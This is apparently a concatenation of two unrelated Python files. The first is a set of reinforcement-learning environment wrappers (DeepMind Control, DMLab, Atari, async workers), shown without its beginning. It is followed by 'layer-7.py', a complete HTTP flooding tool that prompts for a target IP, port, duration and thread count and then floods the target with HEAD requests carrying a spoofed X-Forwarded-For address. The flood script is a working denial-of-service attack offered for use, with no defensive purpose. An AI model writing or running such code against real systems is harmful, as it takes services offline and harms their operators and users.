def __init__(self, env, key='observ'):
self._env = env
self._key = key
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = {self._key: self._env.observation_space}
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {self._key: np.array(obs)}
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = {self._key: np.array(obs)}
return obs
class ConcatObservation(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
spaces = [spaces[key] for key in self._keys]
low = np.concatenate([space.low for space in spaces], 0)
high = np.concatenate([space.high for space in spaces], 0)
dtypes = [space.dtype for space in spaces]
if not all(dtype == dtypes[0] for dtype in dtypes):
message = 'Spaces must have the same data type; are {}.'
raise KeyError(message.format(', '.join(str(x) for x in dtypes)))
return gym.spaces.Box(low, high, dtype=dtypes[0])
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = self._select_keys(obs)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs = self._select_keys(obs)
return obs
def _select_keys(self, obs):
return np.concatenate([obs[key] for key in self._keys], 0)
class SelectObservations(object):
def __init__(self, env, keys):
self._env = env
self._keys = keys
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces
return gym.spaces.Dict({key: spaces[key] for key in self._keys})
@property
def action_space(self):
return self._env.action_space
def step(self, action, *args, **kwargs):
obs, reward, done, info = self._env.step(action, *args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs, reward, done, info
def reset(self, *args, **kwargs):
obs = self._env.reset(*args, **kwargs)
obs = {key: obs[key] for key in self._keys}
return obs
class PixelObservations(object):
def __init__(
self, env, size=(64, 64), dtype=np.uint8, key='image',
render_mode='rgb_array'):
assert isinstance(env.observation_space, gym.spaces.Dict)
self._env = env
self._size = size
self._dtype = dtype
self._key = key
self._render_mode = render_mode
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
high = {np.uint8: 255, np.float: 1.0}[self._dtype]
image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype)
spaces = self._env.observation_space.spaces.copy()
assert self._key not in spaces
spaces[self._key] = image
return gym.spaces.Dict(spaces)
@property
def action_space(self):
return self._env.action_space
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs[self._key] = self._render_image()
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs[self._key] = self._render_image()
return obs
def _render_image(self):
image = self._env.render(self._render_mode)
if image.shape[:2] != self._size:
kwargs = dict(
output_shape=self._size, mode='edge', order=1, preserve_range=True)
image = skimage.transform.resize(image, **kwargs).astype(image.dtype)
if self._dtype and image.dtype != self._dtype:
if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8:
image = (image * 255).astype(self._dtype)
elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64):
image = image.astype(self._dtype) / 255
else:
message = 'Cannot convert observations from {} to {}.'
raise NotImplementedError(message.format(image.dtype, self._dtype))
return image
class ObservationToRender(object):
def __init__(self, env, key='image'):
self._env = env
self._key = key
self._image = None
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return gym.spaces.Dict({})
def step(self, action):
obs, reward, done, info = self._env.step(action)
self._image = obs.pop(self._key)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
self._image = obs.pop(self._key)
return obs
def render(self, *args, **kwargs):
return self._image
class OverwriteRender(object):
def __init__(self, env, render_fn):
self._env = env
self._render_fn = render_fn
self._env.render('rgb_array') # Set up viewer.
def __getattr__(self, name):
return getattr(self._env, name)
def render(self, *args, **kwargs):
return self._render_fn(self._env, *args, **kwargs)
class ActionRepeat(object):
def __init__(self, env, amount):
self._env = env
self._amount = amount
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
done = False
total_reward = 0
current_step = 0
while current_step < self._amount and not done:
observ, reward, done, info = self._env.step(action)
total_reward += reward
current_step += 1
return observ, total_reward, done, info
class NormalizeActions(object):
def __init__(self, env):
self._env = env
low, high = env.action_space.low, env.action_space.high
self._enabled = np.logical_and(np.isfinite(low), np.isfinite(high))
self._low = np.where(self._enabled, low, -np.ones_like(low))
self._high = np.where(self._enabled, high, np.ones_like(low))
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
space = self._env.action_space
low = np.where(self._enabled, -np.ones_like(space.low), space.low)
high = np.where(self._enabled, np.ones_like(space.high), space.high)
return gym.spaces.Box(low, high, dtype=space.dtype)
def step(self, action):
action = (action + 1) / 2 * (self._high - self._low) + self._low
return self._env.step(action)
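# Illustrative note, not part of the original file: NormalizeActions maps agent
# actions from [-1, 1] back to the environment's native bounds. For a
# hypothetical one-dimensional bound of low=0, high=10, an agent action of 0.5
# becomes (0.5 + 1) / 2 * (10 - 0) + 0 = 7.5; dimensions with infinite bounds
# are passed through unchanged.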
class DeepMindControl(object):
metadata = {'render.modes': ['rgb_array']}
reward_range = (-np.inf, np.inf)
def __init__(self, domain, task, render_size=(64, 64), camera_id=0):
if isinstance(domain, str):
from dm_control import suite
self._env = suite.load(domain, task)
else:
assert task is None
self._env = domain()
self._render_size = render_size
self._camera_id = camera_id
@property
def observation_space(self):
components = {}
for key, value in self._env.observation_spec().items():
components[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
return gym.spaces.Dict(components)
@property
def action_space(self):
action_spec = self._env.action_spec()
return gym.spaces.Box(
action_spec.minimum, action_spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': time_step.discount}
if done:
info['done_reason'] = 'timeout'
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
return dict(time_step.observation)
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._env.physics.render(
*self._render_size, camera_id=self._camera_id)
class DeepMindLabyrinth(object):
ACTION_SET_DEFAULT = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(0, 0, 0, -1, 0, 0, 0), # Backward
(0, 0, -1, 0, 0, 0, 0), # Strafe Left
(0, 0, 1, 0, 0, 0, 0), # Strafe Right
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
(-20, 0, 0, 1, 0, 0, 0), # Look Left + Forward
(20, 0, 0, 1, 0, 0, 0), # Look Right + Forward
(0, 0, 0, 0, 1, 0, 0), # Fire
)
ACTION_SET_MEDIUM = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(0, 0, 0, -1, 0, 0, 0), # Backward
(0, 0, -1, 0, 0, 0, 0), # Strafe Left
(0, 0, 1, 0, 0, 0, 0), # Strafe Right
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
(0, 0, 0, 0, 0, 0, 0), # Idle.
)
ACTION_SET_SMALL = (
(0, 0, 0, 1, 0, 0, 0), # Forward
(-20, 0, 0, 0, 0, 0, 0), # Look Left
(20, 0, 0, 0, 0, 0, 0), # Look Right
)
def __init__(
self, level, mode, render_size=(64, 64), action_repeat=4,
action_set=ACTION_SET_DEFAULT, level_cache=None, seed=None,
runfiles_path=None):
assert mode in ('train', 'test')
import deepmind_lab
if runfiles_path:
print('Setting DMLab runfiles path:', runfiles_path)
deepmind_lab.set_runfiles_path(runfiles_path)
self._config = {}
self._config['width'] = render_size[0]
self._config['height'] = render_size[1]
self._config['logLevel'] = 'WARN'
if mode == 'test':
self._config['allowHoldOutLevels'] = 'true'
self._config['mixerSeed'] = 0x600D5EED
self._action_repeat = action_repeat
self._random = np.random.RandomState(seed)
self._env = deepmind_lab.Lab(
level=level,
observations=['RGB_INTERLEAVED'],
config={k: str(v) for k, v in self._config.items()},
level_cache=level_cache)
self._action_set = action_set
self._last_image = None
self._done = True
@property
def observation_space(self):
shape = (self._config['height'], self._config['width'], 3)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return gym.spaces.Discrete(len(self._action_set))
def reset(self):
self._done = False
self._env.reset(seed=self._random.randint(0, 2 ** 31 - 1))
obs = self._get_obs()
return obs
def step(self, action):
raw_action = np.array(self._action_set[action], np.intc)
reward = self._env.step(raw_action, num_steps=self._action_repeat)
self._done = not self._env.is_running()
obs = self._get_obs()
return obs, reward, self._done, {}
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
del args # Unused
del kwargs # Unused
return self._last_image
def close(self):
self._env.close()
def _get_obs(self):
if self._done:
image = 0 * self._last_image
else:
image = self._env.observations()['RGB_INTERLEAVED']
self._last_image = image
return {'image': image}
class LocalLevelCache(object):
def __init__(self, cache_dir='/tmp/level_cache'):
self._cache_dir = cache_dir
tf.gfile.MakeDirs(cache_dir)
def fetch(self, key, pk3_path):
path = os.path.join(self._cache_dir, key)
if tf.gfile.Exists(path):
tf.gfile.Copy(path, pk3_path, overwrite=True)
return True
return False
def write(self, key, pk3_path):
path = os.path.join(self._cache_dir, key)
if not tf.gfile.Exists(path):
tf.gfile.Copy(pk3_path, path)
class Atari(object):
# LOCK = multiprocessing.Lock()
LOCK = threading.Lock()
def __init__(
self, name, action_repeat=4, size=(84, 84), grayscale=True, noops=30,
life_done=False, sticky_actions=True):
import gym
version = 0 if sticky_actions else 4
with self.LOCK:
self._env = gym.make('{}NoFrameskip-v{}'.format(name, version))
self._action_repeat = action_repeat
self._size = size
self._grayscale = grayscale
self._noops = noops
self._life_done = life_done
self._lives = None
shape = self._env.observation_space.shape[:2] + (() if grayscale else (3,))
self._buffers = [np.empty(shape, dtype=np.uint8) for _ in range(2)]
self._random = np.random.RandomState(seed=None)
@property
def observation_space(self):
shape = self._size + (1 if self._grayscale else 3,)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return self._env.action_space
def close(self):
return self._env.close()
def reset(self):
with self.LOCK:
self._env.reset()
# Use at least one no-op.
noops = self._random.randint(1, self._noops) if self._noops > 1 else 1
for _ in range(noops):
done = self._env.step(0)[2]
if done:
with self.LOCK:
self._env.reset()
self._lives = self._env.ale.lives()
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[0])
else:
self._env.ale.getScreenRGB2(self._buffers[0])
self._buffers[1].fill(0)
return self._get_obs()
def step(self, action):
total_reward = 0.0
for step in range(self._action_repeat):
_, reward, done, info = self._env.step(action)
total_reward += reward
if self._life_done:
lives = self._env.ale.lives()
done = done or lives < self._lives
self._lives = lives
if done:
# In principle, the loop could exit before two valid frames have been
# rendered.
break
elif step >= self._action_repeat - 2:
index = step - (self._action_repeat - 2)
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[index])
else:
self._env.ale.getScreenRGB2(self._buffers[index])
obs = self._get_obs()
return obs, total_reward, done, info
def render(self, mode):
return self._env.render(mode)
def _get_obs(self):
if self._action_repeat > 1:
np.maximum(self._buffers[0], self._buffers[1], out=self._buffers[0])
image = skimage.transform.resize(
self._buffers[0], output_shape=self._size, mode='edge', order=1,
preserve_range=True)
image = np.clip(image, 0, 255).astype(np.uint8)
image = image[:, :, None] if self._grayscale else image
return {'image': image}
class OneHotAction(object):
def __init__(self, env, strict=True):
assert isinstance(env.action_space, gym.spaces.Discrete)
self._env = env
self._strict = strict
def __getattr__(self, name):
return getattr(self._env, name)
@property
def action_space(self):
shape = (self._env.action_space.n,)
return gym.spaces.Box(low=0, high=1, shape=shape, dtype=np.float32)
def step(self, action):
index = np.argmax(action).astype(int)
if self._strict:
reference = np.zeros_like(action)
reference[index] = 1
assert np.allclose(reference, action), action
return self._env.step(index)
def reset(self):
return self._env.reset()
class MaximumDuration(object):
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
if self._step is None:
raise RuntimeError('Must reset environment.')
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step >= self._duration:
done = True
self._step = None
if 'done_reason' not in info:
info['done_reason'] = 'timeout'
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class MinimumDuration(object):
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
self._step += 1
if self._step < self._duration:
done = False
return observ, reward, done, info
def reset(self):
self._step = 0
return self._env.reset()
class ProcessObservation(object):
def __init__(self, env, process_fn):
self._env = env
self._process_fn = process_fn
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
return tools.nested.map(
lambda box: gym.spaces.Box(
self._process_fn(box.low),
self._process_fn(box.high),
dtype=self._process_fn(box.low).dtype),
self._env.observation_space)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
class PadActions(object):
def __init__(self, env, spaces):
self._env = env
self._action_space = self._pad_box_space(spaces)
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
action = action[:len(self._env.action_space.low)]
return self._env.step(action, *args, **kwargs)
def reset(self, *args, **kwargs):
return self._env.reset(*args, **kwargs)
def _pad_box_space(self, spaces):
assert all(len(space.low.shape) == 1 for space in spaces)
length = max(len(space.low) for space in spaces)
low, high = np.inf * np.ones(length), -np.inf * np.ones(length)
for space in spaces:
low[:len(space.low)] = np.minimum(space.low, low[:len(space.low)])
high[:len(space.high)] = np.maximum(space.high, high[:len(space.high)])
return gym.spaces.Box(low, high, dtype=np.float32)
class ObservationDropout(object):
def __init__(self, env, key, prob):
self._env = env
self._key = key
self._prob = prob
self._random = np.random.RandomState(seed=0)
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = self._process_fn(observ)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = self._process_fn(observ)
return observ
def _process_fn(self, observ):
if self._random.uniform(0, 1) < self._prob:
observ[self._key] *= 0
return observ
class CollectDataset(object):
def __init__(self, env, outdir):
self._env = env
self._outdir = outdir and os.path.expanduser(outdir)
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action, *args, **kwargs):
if kwargs.get('blocking', True):
transition = self._env.step(action, *args, **kwargs)
return self._process_step(action, *transition)
else:
future = self._env.step(action, *args, **kwargs)
return lambda: self._process_step(action, *future())
def reset(self, *args, **kwargs):
if kwargs.get('blocking', True):
observ = self._env.reset(*args, **kwargs)
return self._process_reset(observ)
else:
future = self._env.reset(*args, **kwargs)
return lambda: self._process_reset(future())
def _process_step(self, action, observ, reward, done, info):
transition = self._process_observ(observ).copy()
transition['action'] = action
transition['reward'] = reward
if done:
reason = info.get('done_reason', 'termination')
transition['pcont'] = dict(termination=0.0, timeout=1.0)[reason]
else:
transition['pcont'] = 1.0
self._episode.append(transition)
if done:
episode = self._get_episode()
if self._outdir:
filename = self._get_filename(episode)
self._write(episode, filename)
return observ, reward, done, info
def _process_reset(self, observ):
# Resetting the environment provides the observation for time step zero.
# The action and reward are not known for this time step, so we zero them.
transition = self._process_observ(observ).copy()
transition['action'] = np.zeros_like(self.action_space.low)
transition['reward'] = 0.0
transition['pcont'] = 1.0
self._episode = [transition]
return observ
def _process_observ(self, observ):
if not isinstance(observ, dict):
observ = {'observ': observ}
return observ
def _get_filename(self, episode):
timestamp = datetime.datetime.now().strftime('%Y%m%dT%H%M%S')
identifier = str(uuid.uuid4().hex)
length = len(episode['reward'])
filename = '{}-{}-{}.npz'.format(timestamp, identifier, length)
filename = os.path.join(self._outdir, filename)
return filename
def _get_episode(self):
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: np.array(v) for k, v in episode.items()}
for key, sequence in episode.items():
if sequence.dtype not in (np.uint8, np.float32, np.float64, np.bool):
message = "Sequence for key {} is of unexpected type {}:\n{}"
raise RuntimeError(message.format(key, sequence.dtype, sequence))
return episode
def _write(self, episode, filename):
if not tf.gfile.Exists(self._outdir):
tf.gfile.MakeDirs(self._outdir)
with io.BytesIO() as file_:
np.savez_compressed(file_, **episode)
file_.seek(0)
with tf.gfile.Open(filename, 'w') as ff:
ff.write(file_.read())
folder = os.path.basename(self._outdir)
name = os.path.splitext(os.path.basename(filename))[0]
word = 'with' if np.sum(episode.get('reward_mask', 1)) > 0 else 'without'
score = episode['reward'].sum()
message = 'Recorded episode {} of length {} {} score of {:.1f} to {}.'
print(message.format(name, len(episode['action']), word, score, folder))
class NoRewardHint(object):
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
@property
def observation_space(self):
spaces = self._env.observation_space.spaces.copy()
low = np.zeros(1, dtype=np.float32)
high = np.ones(1, dtype=np.float32)
spaces['reward_mask'] = gym.spaces.Box(low, high)
return gym.spaces.Dict(spaces)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs['reward_mask'] = np.zeros(1, dtype=np.float32)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
obs['reward_mask'] = np.zeros(1, dtype=np.float32)
return obs
class ConvertTo32Bit(object):
def __init__(self, env):
self._env = env
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
observ, reward, done, info = self._env.step(action)
observ = tools.nested.map(self._convert_observ, observ)
reward = self._convert_reward(reward)
return observ, reward, done, info
def reset(self):
observ = self._env.reset()
observ = tools.nested.map(self._convert_observ, observ)
return observ
def _convert_observ(self, observ):
if not np.isfinite(observ).all():
raise ValueError('Infinite observation encountered.')
if observ.dtype == np.float64:
return observ.astype(np.float32)
if observ.dtype == np.int64:
return observ.astype(np.int32)
return observ
def _convert_reward(self, reward):
if not np.isfinite(reward).all():
raise ValueError('Infinite reward encountered.')
return np.array(reward, dtype=np.float32)
class Async(object):
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor, strategy='thread'):
if strategy == 'thread':
import multiprocessing.dummy as mp
elif strategy == 'process':
import multiprocessing as mp
else:
raise NotImplementedError(strategy)
self._strategy = strategy
self._conn, conn = mp.Pipe()
self._process = mp.Process(target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__('observation_space')
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__('action_space')
return self._action_space
def __getattr__(self, name):
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
promise = self.call('step', action)
if blocking:
return promise()
else:
return promise
def reset(self, blocking=True):
promise = self.call('reset')
if blocking:
return promise()
else:
return promise
def _receive(self):
try:
message, payload = self._conn.recv()
except (OSError, EOFError):
raise RuntimeError('Lost connection to environment worker.')
# Re-raise exceptions in the main process.
if message == self._EXCEPTION:
stacktrace = payload
raise Exception(stacktrace)
if message == self._RESULT:
return payload
raise KeyError('Received message of unexpected type {}'.format(message))
def _worker(self, constructor, conn):
try:
env = constructor()
while True:
try:
# Only block for short times to have keyboard exceptions be raised.
if not conn.poll(0.1):
continue
message, payload = conn.recv()
except (EOFError, KeyboardInterrupt):
break
if message == self._ACCESS:
name = payload
result = getattr(env, name)
conn.send((self._RESULT, result))
continue
if message == self._CALL:
name, args, kwargs = payload
result = getattr(env, name)(*args, **kwargs)
conn.send((self._RESULT, result))
continue
if message == self._CLOSE:
assert payload is None
break
raise KeyError('Received message of unknown type {}'.format(message))
except Exception:
stacktrace = ''.join(traceback.format_exception(*sys.exc_info()))
print('Error in environment process: {}'.format(stacktrace))
try:
conn.send((self._EXCEPTION, stacktrace))
except Exception:
print('Failed to send exception back to main process.')
try:
conn.close()
except Exception:
print('Failed to properly close connection.')
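# Illustrative sketch, not part of the original file: the wrappers above are
# meant to be stacked. A hypothetical pipeline for a DeepMind Control task
# could look like the following; the domain/task names, sizes and durations
# are placeholder values, and dm_control must be installed for it to run.
def example_make_dmc_env():
  env = DeepMindControl('walker', 'walk')
  env = ActionRepeat(env, 2)
  env = PixelObservations(env, size=(64, 64), dtype=np.uint8, key='image')
  env = SelectObservations(env, keys=['image'])
  env = NormalizeActions(env)
  env = MaximumDuration(env, 1000)
  env = ConvertTo32Bit(env)
  return env
# To run such an environment in a separate process, the constructor can be
# wrapped as Async(example_make_dmc_env, strategy='process').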
|
layer-7.py
|
# Udah Recode aja Intinya Credit
import socket
import os, sys
import time
import threading, random
print("""
[ - ]====================[ - ]
[ ! ] Layer-7 [HTTP-Flooder]
[ ! ] Coded By NumeX
[ ! ] Made with Love -/
[ - ]====================[ - ]
\n""")
ip = input("[ ? ] Enter IP Target : ")
ip = socket.gethostbyname(ip)
port = int(input("[ ? ] Port : "))
times = int(input("[ ? ] How long you wanna attack : "))
run = int(input("[ ? ] Runner : "))
url = "http://" + str(ip)
def randomip():
randip = []
randip1 = random.randint(1,255)
randip2 = random.randint(1,255)
randip3 = random.randint(1,255)
randip4 = random.randint(1,255)
randip.append(randip1)
randip.append(randip2)
randip.append(randip3)
randip.append(randip4)
randip = str(randip[0]) + "." + str(randip[1]) + "." + str(randip[2]) + "." + str(randip[3])
return(randip)
print('[</>] Start Attacking {} [</>]'.format(ip))
# i Dont Loop it, cuz i scared the tools is overloads lol
time.sleep(1)
def startAttack():
connection = "Connection: null\r\n"
referer = "Referer: null\r\n"
forward = "X-Forwarded-For: " + randomip() + "\r\n"
get_host = "HEAD " + url + " HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + referer + connection + forward + "\r\n\r\n"
while True:
try:
atk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
atk.connect((ip, port))
for y in range(times): # Start attack
atk.send(str.encode(request))
except socket.error:
time.sleep(.1)
except:
pass
if __name__ == "__main__":
for i in range(run):
th = threading.Thread(target=startAttack).start()
|